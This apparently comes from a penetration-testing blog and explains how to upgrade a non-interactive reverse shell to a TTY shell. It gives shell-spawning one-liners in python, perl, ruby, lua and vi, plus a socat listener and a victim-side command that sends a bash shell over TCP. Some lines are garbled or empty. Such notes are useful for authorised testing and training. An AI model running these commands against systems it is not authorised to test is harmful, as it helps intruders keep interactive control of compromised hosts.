Spawning a TTY Shell

How to get an interactive shell or TTY shell


During penetration testing, for example, if you found a vulnerable web application and were able to get a reverse shell back to your machine. Usually, the shell that you receive is own by the user of the running service such as “www-data” or something similar. This kind of users is not meant to have a shell because they don’t need to interact with the operating system as humans do.

There are some commands (such as less, vi, su, sudo, passwd .. etc.) that don’t work with non-tty-shell and non-interactive shell. For that reason, you need to upgrade your shell and get a tty-shell.

To check if the shell is a tty shell, just enter tty command like the following.

$ tty
not a tty
$ tty

Here are some commands which will enable you to spawn a tty shell:


This is the most popular method for spawning a tty shell. The target server should have python or python3 installed.

python -c "import pty;pty.spawn('/bin/bash')"



echo 'os.system('/bin/bash')'



/bin/sh -i



/bin/bash -i



perl -e 'exec "/bin/sh";'



ruby: exec "/bin/sh"



lua: os.execute('/bin/sh')


From within vi:

:set shell=/bin/bash:shell


From within nmap:




Socat is like netcat on steroids and is a very powerful networking swiss-army knife. Socat utility can be used to transfer full TTY’s over TCP connections.

Note: Socat is not installed by default. So, you can try to compile the binary itself or download a socat binary from the following links:

On your machine (the attacker machine), start Socat listener:

socat -,raw,echo=0 tcp-listen:4444

On the victim machine, type the following:

socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:



Leave A Reply

Your email address will not be published.